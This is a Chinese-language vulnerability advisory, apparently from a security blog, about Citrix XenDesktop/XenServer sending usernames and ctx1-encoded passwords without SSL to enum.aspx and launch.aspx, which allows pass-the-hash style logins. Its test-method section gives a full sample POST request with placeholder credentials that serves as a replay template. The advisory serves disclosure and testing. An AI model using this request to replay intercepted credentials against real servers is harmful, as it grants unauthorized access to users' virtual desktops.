Citrix XenDesktop/XenServer验证凭据信息泄露漏洞

漏洞起因
设计错误
危险等级

影响系统
Citrix XenServer 5.6 SP2
Citrix XenDesktop

不受影响系统

危害
远程攻击者可以利用漏洞绕过验证登录虚拟桌面。

攻击所需条件
攻击者必须访问Citrix XenApp。

漏洞信息
Citrix XenApp是一款端到端的Windows应用交付系统,可以实现客户端和服务器端的应用虚拟化。
默认情况下,在Citrix Receiver客户端到WEB接口的验证没有配置使用SSL,如果公司选择不使用SSL,在Citrix Receiver客户端到WEB接口之间的XML事务传递给enum.aspx和launch.aspx会包含用户名和编码的密码。如果攻击者能截获此验证通信,就可以使用编码后的密码通过Citrix Receiver来执行”pass-the-hash”类型攻击,以目标用户上下文登录,获得对用户虚拟桌面的访问。

测试方法
POST /Citrix/XDPNAgent/enum.aspx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: C:\PROGRA~1\Citrix\ICACLI~1\PNAMain.exe
Host: xxx.xxx.xxx.xxx
Content-Length: 705
Connection: Keep-Alive
Cache-Control: no-cache
<?xml version=”1.0″ encoding=”UTF-8″?><!DOCTYPE NFuseProtocol SYSTEM “NFuse.dtd”><NFuseProtocol version=”4.6″><RequestAppData><Scope traverse=”onelevel” type=”PNFolder”>$PRELAUNCH$</Scope><DesiredDetails>permissions</DesiredD
etails><DesiredDetails>icon-info</DesiredDetails><DesiredDetails>all</De
siredDetails><ServerType>x</ServerType><ServerType>win32</ServerType><Cl
ientType>ica30</ClientType><ClientType>content</ClientType><Credentials>
<UserName>domain\myuser</UserName><Password encoding=”ctx1″>ENCODEDPASSWORDHERE</Password><Domain type=”NT”></Domain></Credentials><ClientName>COMPUTER01</ClientName><Cli
entAddress>xxx.xxx.xxx.xxx</ClientAddress></RequestAppData></NFuseProtoc
ol>

厂商解决方案
目前没有详细解决方案提供:
http://www.citrix.com/

漏洞提供者
vtek63

发表评论?

0 条评论。

发表评论